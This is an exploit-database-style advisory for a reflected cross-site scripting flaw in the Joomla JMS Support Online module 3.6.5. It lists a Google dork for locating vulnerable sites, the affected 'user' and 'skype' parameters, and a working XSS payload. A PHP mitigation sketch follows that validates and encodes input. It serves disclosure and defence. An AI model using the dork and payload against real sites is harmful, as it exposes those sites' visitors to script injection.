Joomla JMS Support Online Module 3.6.5 Cross Site Scripting
Posted on 22 February 2017
Exploit Title : Joomla JMS Support Online Module Reflected XSS - skype extension
Google Dork : inurl:sendmessage.php?type=skype
Date : 12/02/2017
Exploit Author : Marc Castejon <marc@silentbreach.com>
Vendor Homepage : https://www.joommasters.com
Version: 3.6.5
Type : webapps
Platform: Joomla
------------------------------------------------
Type: Reflected XSS
Vulnerable URL: http://localhost/[PATH]/sendmessage.php
Vulnerable Parameters: ?type=skype&user=<vulnerable>&skype=<vulnerable>
Method: GET
Payload: "><img src=i onerror=prompt(2)>
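Mitigation sketch (an added example, not code from the advisory or from the JMS Support Online module, whose source is not shown here): a handler that validates the skype parameter against an allowlist and encodes both parameters for the context they are written into. The function names, the Skype-name pattern, the link markup and the assumption that the values are reflected into a double-quoted HTML attribute are all hypothetical.

```php
<?php
// Hypothetical handler for ?type=skype&user=...&skype=... (not the module's source).

// Encode a value for HTML text or a quoted attribute value.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Read a query parameter as a string; array input (?user[]=x) becomes ''.
function get_param(array $query, string $name): string
{
    $value = $query[$name] ?? '';
    return is_string($value) ? $value : '';
}

// Assumed allowlist: 6-32 characters, leading letter, then letters,
// digits and . , _ : - only. Adjust to the account formats in use.
function is_valid_skype_name(string $name): bool
{
    return preg_match('/\A[A-Za-z][A-Za-z0-9._,:-]{5,31}\z/', $name) === 1;
}

function render_skype_link(array $query): string
{
    $user  = get_param($query, 'user');
    $skype = get_param($query, 'skype');

    // Reject anything that is not a plausible Skype name before output.
    if (!is_valid_skype_name($skype)) {
        return '<p>Invalid Skype name.</p>';
    }

    // Encode for the URI first, then for the HTML attribute around it.
    $href = 'skype:' . rawurlencode($skype) . '?chat';

    return '<a href="' . h($href) . '" title="' . h($user) . '">'
        . h($user) . '</a>';
}

// Constructed input: the advisory's payload string in both parameters,
// then in user only with a well-formed skype value.
$payload = '"><img src=i onerror=prompt(2)>';
echo render_skype_link(['type' => 'skype', 'user' => $payload, 'skype' => $payload]), "\n";
echo render_skype_link(['type' => 'skype', 'user' => $payload, 'skype' => 'support.desk']), "\n";
```

In a real deployment the array passed in would be $_GET; the encoding step is what keeps the quote and angle brackets in the payload from closing the attribute and opening a new tag.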